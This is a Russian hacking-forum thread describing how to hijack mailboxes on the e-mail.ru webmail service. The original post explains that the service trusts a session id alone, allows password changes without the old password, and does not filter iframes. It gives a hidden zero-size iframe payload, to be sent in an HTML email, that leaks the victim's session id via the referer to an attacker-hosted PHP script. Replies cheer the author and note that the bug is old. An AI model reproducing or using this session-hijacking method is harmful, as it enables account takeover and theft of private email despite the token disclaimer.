![]() |
Захват ящика на e-mail.ru
В продолжении обзора багов во второстепенных почтовых серверах рунета...:
Сервер не использует cookie, идентификация пользователя осуществляется только по id. Собственно сам баг заключается в том, что пароль к ящику можно изменить, не зная старого пароля. Сервер не фильтрует тег iframe, что позволяет нам встроить в страницу свой скрипт на php, на который передаётся referer, из которого мы и вырежем идентификатор сессии. Посылаем жертве письмо в html формате вида : Код HTML:
<iframe src="http://adres_skripta/skript.php" height=0 width=0 scrolling=no frameborder=no></iframe>skript: PHP код:
P.S. Изменяя таким образом пароль, у ящика становится 2 пароля (старый действителен до тех пор, пока не будет введён новый) P.SS ДАННАЯ ИНФОРМАЦИЯ НОСИТ ЧИСТО ПОЗНОВАТЕЛЬНЫЙ ХАРАКТЕР. НЕ ПРИМЕНЯЙТЕ ЕЁ. Автор: Mayor |
популярная уязвимость =) админы почтовиков сильно тормозят))) Mayor РЕСПЕКТ :)
|
гыгыыы.... Майор, реально респект!!!! гыгыгыгыы
/me ушел ломать весь интр0нет и пригородные поезда... гыгыы ДиДжей убийца, ты на дату посмотрел? ыггы |
Полезная вещь... была лет этак 2 назад =))))))))
Популяция археологов-некрофилов реско возрастает, кащейчег, не находишь? =)))) |
| Время: 09:27 |